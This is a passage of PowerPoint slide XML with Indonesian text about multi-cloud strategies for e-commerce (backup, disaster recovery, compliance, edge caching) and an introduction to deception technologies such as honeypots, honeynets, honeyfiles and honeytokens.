              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> caching. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330425275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Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penipuan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Honeypots, Honeynets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Honeyfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan Honeytokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Honeypots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Honeynets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> honeypot yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
